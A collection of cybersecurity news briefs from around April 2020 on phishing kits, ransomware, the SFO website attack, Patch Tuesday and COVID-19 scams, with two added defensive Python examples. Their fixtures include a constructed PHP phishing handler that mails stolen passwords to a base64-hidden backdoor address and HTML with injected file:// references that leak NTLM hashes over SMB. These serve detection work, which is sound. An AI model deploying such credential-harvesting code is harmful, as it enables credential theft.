Researchers have warned of a booming underground market for phishing kits: the tools novices can use to set up convincing websites designed to harvest victims' credentials.
Singapore-based Group-IB claimed that prices have surged 149% over the past year, while the number of ads for these kits on black market forums doubled and the number of sellers increased by over 120%.
The average price is said to have soared from $122 in 2018 to over $300 per product last year.
All of this indicates a growing demand for more complex, high quality kits — possibly because cybersecurity tools are getting better at stopping commodity attacks.
At one end of the scale, free products are often booby-trapped with backdoors that quietly send the kit's creator a copy of whatever data it harvests, while at the other, high-end kits come with technical support and high quality phishing pages, according to Group-IB.
Group-IB said it managed to detect over 16,200 unique phishing kits in 2019. It does so by tracing the designated email address to which any harvested data is sent. The number of these unique emails rose 8% last year.
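Group-IB does not describe its tooling. The following is an added example, not Group-IB's code or any real kit's code, of the analyst task behind both points above: pulling the "drop" e-mail addresses out of a kit's PHP result handler, including a second recipient hidden behind base64_decode(), which is the usual shape of the backdoor in free kits. The kit source is constructed for the example, and the address names are placeholders.

```python
"""Pull exfiltration ("drop") e-mail addresses out of a phishing kit.

Added example, not Group-IB's tooling or any real kit's code. Kits hand
harvested form fields to a PHP script that calls mail(); cheap or free
kits frequently carry a second mail() whose recipient is hidden behind
base64_decode() so the kit author also receives the data. The kit source
below is constructed for this example.
"""
import base64
import re

# Constructed sample of a kit's result handler (assumption: illustrative
# shape only, not taken from a specific kit).
KIT_SOURCE = r'''<?php
$ip = $_SERVER['REMOTE_ADDR'];
$message = "Email: " . $_POST['email'] . "\nPass: " . $_POST['pass'] . "\nIP: " . $ip;
$send = "ops-drop@example.net";           // buyer's address
$subject = "New Login | " . $ip;
mail($send, $subject, $message);
// "anti-bot" helper left in by the kit author
$chk = base64_decode("YmFja2Rvb3JAZXZpbC5leGFtcGxl");
mail($chk, $subject, $message);
header("Location: https://www.example.com/signin");
?>'''

EMAIL_RE = re.compile(r'[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}')
# Literal arguments to PHP's base64_decode(): the common hiding place.
B64_ARG_RE = re.compile(r'base64_decode\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)')


def extract_drop_addresses(source: str) -> dict:
    """Return plain-text addresses, addresses recovered from base64 literals,
    and those that appear only in obfuscated form (backdoor candidates)."""
    plain = set(EMAIL_RE.findall(source))
    decoded = set()
    for blob in B64_ARG_RE.findall(source):
        try:
            text = base64.b64decode(blob, validate=True).decode('utf-8', 'replace')
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        decoded.update(EMAIL_RE.findall(text))
    return {
        'plain': sorted(plain),
        'decoded': sorted(decoded),
        'hidden_only': sorted(decoded - plain),
    }


if __name__ == '__main__':
    for kind, addrs in extract_drop_addresses(KIT_SOURCE).items():
        print(f'{kind:12s} {", ".join(addrs) or "-"}')
```

Run over a kit archive, the `hidden_only` list is what points back at the creator rather than the buyer; kits also hide addresses with str_rot13(), hex escapes or string concatenation, so the base64 case is one of several decoders an analyst ends up adding.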
“Phishing kit creators are the driving force of this criminal marketplace — one individual might be behind the creation of hundreds of phishing pages and, even worse, behind the compromise of the personal information of thousands of people,” said Group-IB CTO Dmitry Volkov.
“Therefore, the fight against phishing kit creators should be at the core of the struggle to eradicate phishing.”
Group-IB boasted that it has already been able to deanonymize phishing kit creators and share its intel with law enforcers. However, this practice is getting harder as phishers look to hide their activities.
The vendor claimed only 113,460 out of 2.7 million phishing pages it detected last year contained a phishing kit.
The top brands targeted last year were Amazon, Google, Instagram, Office 365, and PayPal, while the top underground markets for trade in phishing kits were Exploit, OGUsers, and Crimenetwork.
Ransomware attackers are demanding €10 million ($11m) from a European energy giant or else they will release stolen corporate documents, researchers have claimed.
A group using the RagnarLocker variant appears to have targeted the Lisbon-headquartered Energias de Portugal (EDP) group, which employs over 11,000 staff globally and made over €3.3 billion in gross operating income in 2018.
Ethical hacker Vitali Kremez posted screenshots of the ransom note dated Tuesday to Twitter. In it, the attackers threaten to publish 10TB of data from the company’s file servers “or sell it to interested parties” if EDP doesn’t pay up.
Another screenshot apparently shows checks in the code to prevent execution in countries formerly part of the Soviet Union.
MalwareHunterTeam said that the screenshots of stolen data already published on the group's 'news' site seem to indicate they may well have access to terabytes of data.
“As frequently, in this case too the actors were in the victim's network for some time before running the RW,” they added, on Twitter. “Obviously we can't tell from when they were in EDP's network, but it looks like they already had some amount of files stolen on the 6th this month.”
Not to be confused with the similar-sounding Ragnarok ransomware, RagnarLocker was first discovered at the end of last year, targeting Windows-based systems. It’s said to target software used by managed service providers (MSPs) to stay hidden.
The EDP site itself appeared to be functioning relatively normally at the time of writing, although a pop-up window noted: “due to constraints in the information systems, your EDP Online customer area and the 808 53 53 53 service line have temporarily limited access.”
Given their role as critical infrastructure providers, utilities firms are a natural target for ransomware attackers.
Police in India have foiled a cyber-criminal's attempt to sell the world's biggest statue online for $4bn.
Cops took action after learning that an unidentified fraudster was trying to flog the 597-foot-tall "Statue of Unity" on the online Indian marketplace OLX.
The mighty statue, which stands in the western state of Gujarat, portrays statesman and independence activist Vallabhbhai Jhaverbhai Patel, known as Sardar Patel, who was one of the founding fathers of India. Completed in 2018, the statue took five years to build and stands twice as tall as the Statue of Liberty.
The scoundrel behind the fake sale fraudulently claimed that the proceeds from it would fund the Gujarat state government's ongoing fight to stop the spread of COVID-19.
"Some unknown person placed an advertisement on OLX on Saturday stating he needs to sell the Statue of Unity for ₹30,000 crore to meet the requirement of money to buy hospitals and healthcare equipment," a Kevadiya police station official said.
Indian police lodged a cheating and forgery case against the unknown fraudster last week. The audacious statue-for-sale ruse is the latest COVID-related scam to hit India.
Police and internal security officials said many Indians and non-resident Indians (NRIs) had fallen prey to fake versions of the flagship "PM CARES Fund" payments interface that look deceptively similar to the original.
“We have received over 8,300 complaints from individuals across India and NRIs who have donated thousands of dollars into fake accounts,” said a senior home ministry official.
The CEO of National Payments Corporation of India, an umbrella organization for retail payments, Dilip Asbe, added: “We have already blocked all handles with permutations and combinations of the ‘PM Cares Fund’ that were illegitimate, and we are being watchful and ensuring that the handles for donations get verified."
According to Gulf News, other cyber-scams operating in India right now that are exploiting the coronavirus outbreak include one in which fraudsters impersonate the streaming service Netflix. Using the lure of a discounted subscription while India's 1.3 billion people are under lockdown, the scammers steal victims' personal information and card payment details.
A malware attack on the Florida town of Jupiter has caused problems that are out of this world.
The Palm Beach County conurbation was struck with REvil ransomware, also known as Sodinokibi, on March 21 in an attack that took down the town's computer system for three weeks.
Kate Moretto, Jupiter's public information officer, confirmed that multiple files had been encrypted as a result of the incident.
The threat that came out of cyberspace made it impossible for Town of Jupiter employees to access their email accounts to conduct town business. Residents were left unable to make utility payments using online services, and the town's online plan-submission system was also knocked offline.
Speaking on April 1, Moretto said the town was still trying to find out how the malware had infiltrated its computer network.
Asked if the town would be paying a ransom to threat actors to retrieve its encrypted files, Moretto said that Jupiter had not engaged with any links and hadn't viewed any ransom demands. Instead, the town is recovering what data it can from backups, which Moretto described as "quite good."
“I don’t think there’s anything that’s kept it from being resolved,” Moretto said. “I just think it’s a very careful process to get everything back in place.”
Jupiter's mayor Todd Wodraska said that the timing of the attack, which befell the town in the midst of the COVID-19 health crisis, was "kind of awful."
Wodraska said: “It feels like most business types of things have really slowed down or whatever but it’s a terrible time to lose your emails because that’s really the best way of communicating with people given that you’re not supposed to be face-to-face."
Residents were asked to pay their water bills through the mail or by leaving payments in a drop-off box in the town hall.
Jupiter councilman Ilan Kaufer said that while the town's computer systems were down, he and other councilors communicated with residents via Facebook.
By April 10, most of the town's digital services had been restored, and the town website was once again operational.
This was the second such attack on Jupiter, which suffered its first run-in with ransomware in December 2018.
The United States has published fresh guidance on the "significant threat" posed by North Korea's "malicious cyber activities."
A comprehensive advisory jointly issued April 15 by the US Departments of State, Treasury, and Homeland Security, and the Federal Bureau of Investigation highlighted the threat posed by the East Asian country and gave tips on how to stay cyber-safe.
In particular, the alert warned Americans to be on the lookout for crypto-jacking, extortion campaigns, cyber-enabled financial theft, and money-laundering scams.
The alert, published today on the Cybersecurity and Infrastructure Security Agency website, states: "The advisory highlights the cyber threat posed by North Korea—formally known as the Democratic People’s Republic of Korea (DPRK)—and provides recommended steps to mitigate the threat."
According to the advisory, the DPRK's digital dastardliness could prove dangerous not just to the United States, but to the whole world.
The alert warns: "The DPRK’s malicious cyber activities threaten the United States and the broader international community and, in particular, pose a significant threat to the integrity and stability of the international financial system."
It is suggested in the alert that the DPRK is using the profits from cyber-crime to strengthen its military capabilities.
"Under the pressure of robust U.S. and UN sanctions, the DPRK has increasingly relied on illicit activities—including cybercrime—to generate revenue for its weapons of mass destruction and ballistic missile programs," states the advisory.
Financial gain is not the only motive for carrying out cyber-attacks, according to the alert.
"The DPRK has the capability to conduct disruptive or destructive cyber activities affecting U.S. critical infrastructure," warned the alert's authors. "The DPRK also uses cyber capabilities to steal from financial institutions, and has demonstrated a pattern of disruptive and harmful cyber activity that is wholly inconsistent with the growing international consensus on what constitutes responsible State behavior in cyberspace."
The UN Security Council 1718 Committee Panel of Experts' 2019 mid-term report mentions that it was investigating dozens of suspected DPRK cyber-enabled heists and that, as of late 2019, the DPRK has attempted to steal as much as $2bn through illicit cyber-activities.
A cyber-attack on San Francisco International Airport (SFO) last month was carried out by state-sponsored Russian hackers, according to Eset.
As reported by Infosecurity, the airport revealed in a breach notification last week that its SFOConnect.com and SFOConstruction.com websites came under attack in March.
“The attackers inserted malicious computer code on these websites to steal some users’ login credentials,” the notice explained. “Users possibly impacted by this attack include those accessing these websites from outside the airport network through Internet Explorer on a Windows-based personal device or a device not maintained by SFO.”
However, Eset went further in a social media post yesterday, claiming that the incident was “in line with the TTPs of an APT group known as Dragonfly/Energetic Bear.”
“The intent was to collect Windows credentials (username/NTLM hash) of visitors by exploiting an SMB feature and the file:// prefix,” it explained.
The firm also dismissed rumors that the attack had been carried out by Magecart digital skimming hackers.
“The targeted information was NOT the visitor's credentials to the compromised websites, but rather the visitor's own Windows credentials,” it said.
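The mechanism ESET describes is a page that references a resource by `file://` URL or UNC path on an attacker-controlled host: Internet Explorer (unlike current Chrome and Firefox, which refuse `file://` loads from http(s) pages) fetches it over SMB, and the Windows client answers the server's challenge with the user's username and NTLM hash, which is why only IE users on non-SFO devices were in scope. The scanner below is an added example, not ESET's detection logic or SFO's code, that flags such references in a page's HTML and CSS; the sample page and the host `203.0.113.7` are constructed.

```python
r"""Find page references that make Internet Explorer leak Windows credentials.

Added example; not ESET's detection logic or SFO's code. An injected
<img src="file://attacker/x.png">, a UNC path such as \\attacker\share\x.png,
or a CSS url() pointing at either makes IE fetch the resource over SMB, and
the Windows client answers the server's NTLM challenge with the user's
username and NTLM hash. This scanner flags such references; the HTML below
is constructed for this example.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Attributes the browser fetches without user interaction.
AUTO_FETCH_ATTRS = {'src', 'background', 'data', 'poster'}
CSS_URL_RE = re.compile(r'url\(\s*["\']?([^"\')]+)["\']?\s*\)', re.I)


def smb_host(ref: str):
    """Return the host a Windows client would contact over SMB for this
    reference, or None if it is not a remote file:// URL or UNC path."""
    ref = ref.strip()
    if ref.startswith('\\\\'):                 # \\host\share\file
        return ref[2:].split('\\', 1)[0].lower() or None
    if ref.lower().startswith('file:'):
        parsed = urlparse(ref)
        if parsed.netloc:                      # file://host/share/file
            return parsed.netloc.lower()
        if parsed.path.startswith('//'):       # file:////host/share/file
            return parsed.path.lstrip('/').split('/', 1)[0].lower() or None
    return None  # http(s), relative, or a local file:///C:/... path


class SmbRefScanner(HTMLParser):
    """Collect (tag, attribute, reference, host) for SMB-triggering references."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_style = False

    def handle_starttag(self, tag, attrs):
        if tag == 'style':
            self._in_style = True
        for name, value in attrs:
            if not value:
                continue
            name = name.lower()
            if name in AUTO_FETCH_ATTRS or (name == 'href' and tag == 'link'):
                self._check(tag, name, value)
            elif name == 'style':              # inline CSS: url(...)
                for ref in CSS_URL_RE.findall(value):
                    self._check(tag, 'style', ref)

    def handle_endtag(self, tag):
        if tag == 'style':
            self._in_style = False

    def handle_data(self, data):
        if self._in_style:                     # <style> block: url(...)
            for ref in CSS_URL_RE.findall(data):
                self._check('style', 'css', ref)

    def _check(self, tag, where, ref):
        host = smb_host(ref)
        if host:
            self.findings.append((tag, where, ref.strip(), host))


def scan_html(html: str):
    scanner = SmbRefScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed page: one benign stylesheet, one benign image, one local
# file:// link, and three references that would reach out over SMB.
SAMPLE_HTML = """<!doctype html>
<html><head>
<link rel="stylesheet" href="/static/site.css">
<style>body { background: url(file://203.0.113.7/s/bg.png); }</style>
</head><body>
<img src="/img/logo.png" alt="logo">
<img src="file://203.0.113.7/share/pixel.gif" width="1" height="1">
<div style="background-image:url('\\\\203.0.113.7\\share\\t.png')"></div>
<a href="file:///C:/Windows/notepad.exe">local link</a>
</body></html>
"""

if __name__ == '__main__':
    for tag, where, ref, host in scan_html(SAMPLE_HTML):
        print(f'<{tag} {where}> -> {host}  ({ref})')
```

A hit on a public site is almost always injected content, since a web page has no legitimate reason to load resources over SMB. On the client side the standard mitigations are blocking outbound TCP 445 and 139 at the perimeter and the Group Policy setting "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers"; the same leak can also be triggered from Office documents and other IE-based renderers, so the scanner only covers the web-page case described here.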
It’s unclear exactly which visitors to the sites it was going after: SFOConnect appears to be a general information site designed for airport staff and contractors, while the SFOConstruction website, currently down for ‘maintenance,’ covers projects, bids and contracts related to the transport hub.
An Eset researcher confirmed that the vendor itself first reported the issue to the airport, which “quickly” fixed it.
Dragonfly has been active since at least 2011 and started out targeting organizations in the aviation as well as defense sectors, before moving on to hit energy and other industrial control system (ICS) firms in critical infrastructure industries.
Like many Russian APT groups, this one is known for relatively sophisticated, multi-stage intrusions often targeting the supply chain first before pivoting to targeted networks for reconnaissance, lateral movement and cyber-espionage.
Microsoft has fixed 113 vulnerabilities this Patch Tuesday, 19 of which are rated critical, including three zero-day bugs being actively exploited in the wild.
The second month in a row that Redmond has issued fixes for over 100 flaws, April’s update round saw patches issued for two zero-days that Microsoft warned users about at the end of March.
CVE-2020-1020 and CVE-2020-0938 are two remote code execution bugs that exist in Microsoft Windows when “the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font - Adobe Type 1 PostScript format.”
Windows 7 and Server 2008 customers are particularly at risk given that the affected platforms are no longer supported by Microsoft.
The third zero-day is CVE-2020-1027, a Windows kernel elevation of privilege flaw which could enable a locally authenticated attacker to run a specially crafted application, allowing them to execute code with elevated permissions.
A fourth vulnerability originally pegged as a zero-day has not been exploited in the wild. CVE-2020-0968 is a memory corruption vulnerability in Internet Explorer due to the improper handling of objects in memory by the scripting engine.
Although not yet exploited, there are several possible scenarios that could put customers at risk, according to Tenable.
“An attacker could convince a victim to visit a website containing malicious code, whether or not that website is owned by the attacker, or a compromised website with malicious code injected into it,” the firm explained. “Another scenario would require the attacker to embed the malicious code into a Microsoft Office document and convince the victim to open it.”
Recorded Future intelligence analyst, Allan Liska, revealed that much of the research done by Microsoft this month was down to a surprising source.
“In 2019, a security researcher going by the handle SandboxEscaper released more than a half dozen zero-day vulnerabilities against Microsoft products,” he explained.
“In a surprising, but welcome, move for Microsoft, they have hired SandboxEscaper and the researcher has made several contributions to this month’s Patch Tuesday. This is great news for Microsoft and the security community at large.”
There has been a huge rise in the number of breached records of governments and individual politicians in the first quarter of 2020, according to research from Atlas VPN. The study showed there were 17 million leaked government records during this period: a 278% increase compared with the first quarter of 2019.
These included several high profile cases, which left sensitive data of citizens exposed to cyber-criminals. In March 2020, the Dutch government disclosed losing two external hard drives, each containing the personal information of over 6.9 million organ donors. In this case, it remains unknown who was responsible and there is currently no evidence of anyone attempting to use the information.
In another case, the records of 6.5 million Israeli voters were leaked online in February, and in the same month, the government of Quebec, Canada, admitted to a data breach that has potentially exposed the records of 360,000 teachers.
The findings serve as a wake-up call for governments around the world.
Rachel Welsh, COO of Atlas VPN, commented: “Hackers are always searching for networks that have not implemented the latest cybersecurity measures. This year, it happens to be the case that government websites and applications had many security vulnerabilities. It is unfortunate to see that governments do not invest in protecting their networks the best they can since they are responsible for their citizen’s data.”
The report also revealed that malware, phishing and command and control were the most common types of cyber-attack to take place during March. Malware was the single most common method hackers used to compromise devices, reaching 80,000 attempts globally, representing 53% of all cyber-attacks last month.
Atlas also noted that the real number of government data breaches in this period could be “exponentially higher,” with many exposures not revealed until a few months later. This is even more likely in light of increased hacker activity related to the COVID-19 pandemic.
US consumers have already lost over $13m to COVID-19-related scams since the start of the year, according to new data from the Federal Trade Commission (FTC).
The consumer protection agency revealed in figures released on Monday that it had received 17,425 fraud reports linked to the pandemic, around 46% of which featured monetary loss.
The median fraud loss works out at $568, according to the figures.
Of the 17,000 overall reports, over half (55%) were fraud-related, around a third (32%) were labelled “other,” 7% were “Do Not Call” (DNC) telemarketing scams and a similar number (6%) were labelled as identity theft.
DNC scams are mainly automated (72%) and often impersonate government or businesses. Other popular topics linked to COVID-19 are prescriptions and medical-themed calls, debt reduction and warranties/protection plans.
The volume of these so-called robocalls soared by 325% from 2017 to 2018 to reach an estimated 85 billion worldwide two years ago, according to Caller ID firm Hiya.
The most commonly reported FTC scams were linked to travel (30%), online shopping (19%) and text message-based fraud (11%). So far, consumer financial losses from travel scams have hit nearly $4.8m, followed by online shopping ($1.5m) and “imposter: business” fraud ($1.2m).
The largest number of FTC complaints came from California (2068) followed by Florida (1230), New York (1114) and Texas (1109).
In a bid to further protect consumers from COVID-19 scams, the FTC yesterday sent multiple warning letters to companies in the US and abroad demanding they stop making claims their products can treat the virus.
If the companies don’t comply, the FTC said it may ask a federal court to require money be returned to consumers.
The offending products include a “Face Vital Sonic Silicone Facial Brush,” “PuraTHRIVE Liposomal Vitamin C,” and intravenous (IV) solutions such as “Immunity Boost” IV drips, the “Myers’ Cocktail IV package,” and “High Dose Vitamin C Plus Immune Booster” — the latter of which was advertised on Facebook and Instagram.
“It’s shameful to take advantage of people by claiming that a product prevents, treats, or cures COVID-19,” said Andrew Smith, director of the FTC’s Bureau of Consumer Protection. “We’re seeing these false claims for all sorts of products, but anyone who makes them simply has no proof and is likely just after your money.”
The United Kingdom's National Health Service (NHS) has denied claims that it considered giving ministers the power to de-anonymize users of its planned COVID-19 contact-tracing app.
Plans to roll out the new smartphone app were announced on Sunday, April 12, by health secretary Matt Hancock during a daily UK pandemic briefing. It is hoped that by allowing people who develop COVID-19 symptoms to quickly alert others with whom they have been in proximity, the app will help to stem the spread of the deadly novel coronavirus in the UK.
The new app is currently being developed by the NHSX—the digital innovation branch of the National Health Service—with testing of an early version expected to get under way in the North of England this week.
Explaining how the NHS app would work, Hancock said: “If you become unwell with the symptoms of coronavirus, you can securely tell this new NHS app and the app will then send an alert anonymously to other app users that you’ve been in significant contact with over the past few days, even before you had symptoms, so that they know and can act accordingly.”
The NHSX has said that for the app to be effective, it will need to be adopted by more than 60% of the UK's 66.65 million inhabitants.
Addressing privacy concerns over the contact-tracing app, Hancock said that it would be completely voluntary to use and that users would remain anonymous.
"All data will be handled according to the highest ethical and security standards and would only be used for NHS care and research," said Hancock.
However, a draft government memo produced in March and seen by The Guardian discusses how ministers might be given the ability to order “de-anonymization” of data collected via the app to identify people from their smartphones.
The document, headed “official – sensitive” and “draft – not yet approved,” stated that the app could use device IDs, which are unique to each smartphone, “to enable de-anonymization if ministers judge that to be proportionate at some stage.”
A spokesperson for NHSX denied there were ever plans to de-anonymize data.
A container shipping company has said malware could be to blame for the closure of one of its data centers last week.
The Mediterranean Shipping Company (MSC) took to Twitter on Good Friday to report a network outage issue affecting the website msc.com, which was still down at time of writing.
The incident, which is thought to have occurred on Thursday, April 9, also brought down the shipping company's myMSC portal.
A message posted from the Twitter account MSC Cargo on April 10 stated: "We are sorry to inform you that http://MSC.com and myMSC are currently not available as we've experienced a network outage in one of our data centers. We are working on fixing the issue."
As a result of the outage, self-service tools for making and managing bookings on MSC ships have ceased to be operational. Alternative booking platforms are available, and customers can still book via email and over the phone.
"All our departments, terminals and depots are operating without disruptions,” said MSC. “Customers can still book via INTTRA and GT Nexus, which are both fully functional, or place bookings via email.”
While an investigation into what caused the data network outage is ongoing, MSC said that there was a chance that a cyber-attack could be at the root of the problem.
In a message posted on Twitter on April 10, MSC said: "At this point in time we cannot rule out entirely the possibility of malware, but we can confirm that our agencies' worldwide network is working. And that our local agents support customers for all services as usual."
Following the incident, the container shipping company has closed down its servers at its headquarters in the Swiss city of Geneva. MSC said that the incident had only affected internal data processes and that the servers had been closed for security reasons.
In a tweet shared on April 12, MSC appeared confident that a fix was just around the corner, writing, "Significant progress has been made to solve the network outage, and we are confident the issue will be solved shortly. We will continue to issue regular updates."
(ISC)² is offering online training at heavily discounted prices in a bid to help cybersecurity professionals across the world continue their training and development during the COVID-19 pandemic. The move aims to offset the difficulties those working in the sector are facing in staying up-to-date with the latest cybersecurity practices during this period, with meetings and conferences unable to take place.
With many employees currently working remotely, it is more important than ever for businesses to have the most stringent cybersecurity practices in place to protect themselves. (ISC)², a non-profit association of certified cybersecurity professionals, has therefore introduced special discounts on a number of its virtual training packages to enable the continued development of professionals working in this area.
These include free access for all to its ‘Utilizing Big Data’ course, an All-Access Pass to its entire Professional Development Institute (PDI) library of 35 courses for one year for non-members, and a 33% discount on its Certified Information Systems Security Professional (CISSP) and Certified Cloud Security Professional (CCSP) training courses. There are also deals in place for (ISC)²’s online instructor-led training and webinars featuring expert-led discussions on a range of security topics.
“This is a challenging time for many organizations as well as the cybersecurity professionals who keep them safe from cyber-attacks, as they work to support remote workforces and keep their businesses running,” commented Wesley Simpson, COO of (ISC)². “These professionals still have development and certification goals though, and with travel restrictions and cancelations keeping them from in-person trainings, meetings and conferences, we want to do our part to help them stay on track. These resources are just another way that we can hopefully support the larger cybersecurity community and encourage them to sharpen their skills while dealing with this pandemic.”
(ISC)² has over 150,000 members made up of certified cyber, information, software and infrastructure security professionals worldwide.
British model turned pop singer Dua Lipa has called for social media platforms to be monitored more closely for cyberbullying behavior.
In an interview with music magazine NME, the 24-year-old singer of "Future Nostalgia" opened up about her own experience of being cyberbullied.
Dua Lipa said that she used to run her own Twitter account personally, but the stress of dealing with negative cyberbullying comments became too much for her. Unwilling to exit a convenient platform that helps her stay in touch with her fans, the singer handed over the management of her Twitter account to her media team.
Practicing mental separation has given Dua Lipa the strength to continue using her Instagram account.
“I feel like on Instagram, I post as if I’m on a blog and I can just separate myself from it whereas, on Twitter, after I tweet I try and check all the comments,” she said.
“That was obviously getting quite unhealthy ’cause I would just get really upset about [the response].”
Cyberbullying is a growing social problem. Research conducted by the Cyberbullying Research Center found that in 2019, 36.5% of people felt that they had been bullied compared to just 18.8% of people in 2007.
Dua Lipa said that current monitoring practices for cyberbullying on social media platforms didn't go far enough and called for platform managers to take this digital threat to mental health seriously.
She said: “I know if there’s any abusive content or blah blah blah, they take it down. But I don’t think they see certain things or types of cyber bullying as seriously as they are. Those things need to be monitored a little closer.”
Dua Lipa's comments come as people around the world are increasingly using social media platforms to stay in contact with friends and family while isolating at home to prevent the spread of COVID-19.
According to a recent report by Kantar, the global health crisis has caused social media engagement to increase by 61% over normal usage rates. Overall use of Facebook has shot up by 37%, while Chinese micro-blogging platform Weibo has seen a 58% increase in usage.
Dutch police last week dismantled 15 DDoS “booter” sites and arrested a 19-year-old suspected of taking out two government websites which help citizens get information on the current COVID-19 pandemic.
The man from the southern Dutch city of Breda was caught on suspicion of DDoS-ing MijnOverheid.nl and Overheid.nl for several hours last month.
The former provides a personalized portal for sending and receiving documents to the government, while the latter offers the latest information from the authorities, including important COVID-19 updates.
“By flattening a website like this, you are denying citizens access to their personal data and important government information. We take this very seriously, especially now that the corona crisis is causing additional uncertainty and a great need for information for many people,” said Jeroen Niessen, head of the cybercrime team of the central Netherlands police.
“We want to protect people and companies and make it increasingly difficult for cyber-criminals to carry out a DDoS attack.”
To that end, the same team shut down 15 “booter” sites offering DDoS-for-hire services. These operations have essentially democratized what used to be a technically complex and expensive process, allowing almost anyone to target specific sites and organizations.
“With preventive actions, we want to protect people as much as possible against DDoS attacks. By taking booters and their domain names offline, we make it difficult for cyber-criminals. We have now put quite a few [offline]. If they pop up elsewhere, we will immediately work on it again. Our goal is to seize more and more booters,” said Niessen.
According to data from Imperva, porn sites were most frequently attacked by DDoS-ers last year. It revealed 84.46 attacks per site during 2019, way higher than second and third-placed sectors gaming (13.33) and news (10.16).
Dutch police have a strong competence in cybersecurity, and are often involved in major pan-European operations such as the take downs of notorious dark web sites AlphaBay and Hansa in 2017.
San Francisco International Airport (SFO) has revealed that some users of its websites may have had their logins stolen after a cyber-attack last month.
In a notification posted last week, the major transport hub revealed that its SFOConnect.com and SFOConstruction.com sites came under attack in March.
The former appears to be a general-purpose information site for employees and passengers while the latter covers projects, bids and contracts related to the airport.
“The attackers inserted malicious computer code on these websites to steal some users’ login credentials. Users possibly impacted by this attack include those accessing these websites from outside the airport network through Internet Explorer on a Windows-based personal device or a device not maintained by SFO,” the breach notification revealed.
“What information was involved? At this time, it appears the attackers may have accessed the impacted users’ usernames and passwords used to log on to those personal devices.”
The airport took the affected websites offline following the incident and forced a reset of all SFO-related email and network passwords on March 23. The offending malicious code has also apparently been removed.
However, those possibly affected were urged to take action.
“If you visited either website outside of SFO’s managed networks and using Internet Explorer on a Windows-based device, you should change the password you use to log in to that device,” SFO warned. “You should also consider changing any credentials that use the same username and password combination.”
Colin Bastable, CEO of cyber-training and awareness firm Lucy Security, argued that SFO may have been exposed by employees using work credentials on subsequently breached sites.
“From a cursory glance in the darker corners of the web, I think the biggest risk to flysfo.com is from their employees using official email addresses for personal business on sites like Zynga and Myfitnesspal.com,” he said.
“I also found around 8,00 compromised credentials from late February featuring a couple of flysfo.com email addresses. Perhaps one of these opened the door, allowing the malicious code to be dropped in the SFO websites."
The SFO Construction site is currently undergoing maintenance, while the other appears to be back up and running.
Security researchers have discovered almost four million credentials linked to digital collectibles site Quidd, including a sizeable number of corporate email addresses.
Risk Based Security’s Data Breach Research Team announced the discovery on Friday, revealing the data was available “on a prominent deep web hacking forum.”
It apparently features the email addresses, usernames and bcrypt-hashed passwords of 3,954,416 users.
“The compromised data sets were originally posted on March 12 2020 and self-attributed to a threat actor named ‘Protag.’ However, the files were quickly removed,” the firm explained.
“The data resurfaced on March 29 2020 when it was reuploaded by a different user and has since remained available. One threat actor responded to the post stating that he has already cracked, or decrypted, nearly a million password hashes.”
Although the use of bcrypt will make the passwords harder for cyber-criminals to monetize, concerns persist, especially for some businesses.
Around 1,000 of the user credentials are linked to corporate email addresses, including the accounts of employees at Microsoft, Target, Virgin Media, Accenture, Experian, AIG and other organizations.
Risk Based Security warned the corporate angle could put these firms at extra risk from business email compromise (BEC) and spear-phishing attempts.
That’s besides the more general risk of credential stuffers using the four million-strong data trove to try their luck across other accounts.
Quidd itself has not responded to the researchers' inquiries about the incident since its discovery. The Brooklyn-based firm deals in “digital collectibles” from over 300 brand partners including Disney and DC Comics.
According to Risk Based Security, the leaked data is not being offered for sale, but access is also unrestricted.
Police in the United States have arrested a 39-year-old man for spreading false information about COVID-19 on social media.
San Antonio resident Christopher Charles Perez is accused of starting a coronavirus hoax with a post on his Facebook page.
A federal criminal complaint unsealed April 8 charges Perez with one count of violating 18 United States Code § 1038, which criminalizes the spread of false information and hoaxes related to biological weapons and weapons of mass destruction.
The complaint alleges that Perez posted a threat on Facebook in which he claimed to have paid someone to deliberately spread the novel coronavirus around grocery stores in the San Antonio area of Texas.
In his defense, Perez claimed that the post was a misguided attempt to help prevent the spread of the virus. He said that he posted the bizarre threat in the hope of deterring people from visiting stores and coming into contact with other shoppers.
An anonymous online tipster sent a screenshot of the threat allegedly posted by Perez to the Southwest Texas Fusion Center (SWTFC) on Sunday. After reviewing the Facebook post, the SWTFC contacted the Federal Bureau of Investigation (FBI) office in San Antonio for further investigation.
Perez was arrested by the FBI without incident at his home on Chateau Drive late in the afternoon of Tuesday, April 7. The accused is currently being held in federal custody.
If convicted of the charges against him, Perez could be handed a jail term of up to five years in a federal prison.
The FBI’s Weapons of Mass Destruction Squad and the Joint Terrorism Task Force are investigating this case. Assistant US Attorney Mark Roomberg is prosecuting the case on behalf of the government.
The San Antonio grocery stores that Perez allegedly paid someone to infect with COVID-19 were not mentioned in the criminal filings.
A spokesperson for the Department of Justice said: "To be clear, the alleged threat was false; no one spread coronavirus at grocery stores, according to investigators."
At the time of writing, 177 people had died from COVID-19 in Texas, where there are 9,353 confirmed cases.
A bug bounty platform is inviting hackers to share the proceeds of their successful bug hunts with the COVID-19 Solidarity Response Fund.
On April 8, HackerOne set up a special link on its website that lets hackers donate all or part of the bounties they earn to charity in just a few clicks.
"The community has come together in some amazing ways to support COVID-19 relief efforts from Marc Rogers’ CTI League, the US Digital Response group helping governments, to individual hackers raising their hand to help. Today, HackerOne is doing our part by making it even easier for hackers to give back through bug bounties (monetary earnings for finding real-world security vulnerabilities) with a custom donation profile—https://hackerone.com/hackforgood," said a spokesperson for HackerOne yesterday.
"Hackers can invite 'hackforgood' as a collaborator on any paid bug bounty program to donate all or part of the money they earned to charity."
Although the donation profile was set up in response to an active pandemic, HackerOne said the concept could endure long after the health crisis is resolved.
"The charity will rotate on a monthly basis, but right now donations will go to The World Health Organization (WHO) COVID-19 Solidarity Response Fund," said a spokesperson for HackerOne.
The COVID-19 Solidarity Response Fund was established by the World Health Organization to help countries around the world combat the spread of the novel coronavirus.
Donations help to pay for buying and shipping personal protective equipment to frontline workers, patient care, producing evidence-based guidelines and advice, and accelerating efforts to develop vaccines, tests, and treatments.
